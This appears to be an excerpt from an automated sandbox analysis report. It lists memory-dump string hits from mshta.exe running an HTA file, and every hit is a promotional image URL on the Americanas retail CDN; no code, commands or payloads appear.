https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-home-destaque_desk-094ccd4f78f0.png
Source: mshta.exe, 00000000.00000002.2771581555.0000000009311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745451440.0000000009310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727339470.0000000009305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667375083.0000000009304000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-home-destaque_desk-094ccd4f78f0.png(w
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-home-destaque_desk-094ccd4f78f0.png?
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-home-destaque_mob-dfc74d8af364.png
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717572627.0000000009A5E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771183068.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727644987.00000000093AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/3-banners_home_mob-campanhas-home-300x450-2a
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771183068.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727644987.00000000093AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/4-banners_home_mob-campanhas-home-300x450-79
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727644987.00000000093AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2773947173.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670756222.00000000093B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771941923.00000000093AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/5-banners_home_mob-campanhas-home-300x450-86
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771882158.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727644987.00000000093AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2773947173.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670756222.00000000093B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771941923.00000000093AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/7-banners_home_mob-campanhas-home-300x450-ca
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727644987.00000000093AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2773947173.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670756222.00000000093B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771941923.00000000093AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-banners_home_mob-campanhas-home-300x450-31
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744022226.0000000006E98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727692959.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006E7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-home-destaque_desk-2c70954c6dab.png
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-home-destaque_desk-2c70954c6dab.pngM
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-home-destaque_mob-226821f368af.png
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713650880.00000000065AC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695470306.00000000065AA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705796688.00000000065AB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654867106.00000000065A3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717171158.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/desk-702x108px-megaoferta-Natal-wht-739e8bae
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/mob-648x162px-megaoferta-Natal-wht-81c53fb54
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771581555.0000000009311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745451440.0000000009310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727339470.0000000009305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667375083.0000000009304000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_desk-6116be1e9cac.png
Source: mshta.exe, 00000000.00000002.2771581555.0000000009311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745451440.0000000009310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727339470.0000000009305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667375083.0000000009304000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_desk-6116be1e9cac.pngIv
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_desk-6116be1e9cac.pngY
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_desk-6116be1e9cac.pngg
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2659343990.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749376863.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745043189.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744380912.000000000336C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.000000000336A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766109182.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750683255.0000000003370000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_mob-0600bcc12452.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727062236.000000000A851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2716901409.0000000009A5C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2700261943.0000000009A5A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/exclusivo_app-desk-5c02896f8c53.png
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749376863.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745043189.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744380912.000000000336C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.000000000336A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766109182.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750683255.0000000003370000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/exclusivo_app-mob-19fde28501d5.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717572627.0000000009A5E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771882158.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695409967.0000000009A5D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667375083.0000000009304000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/09/sec-brinquedos_esporte-e-lazer-destaque-desk
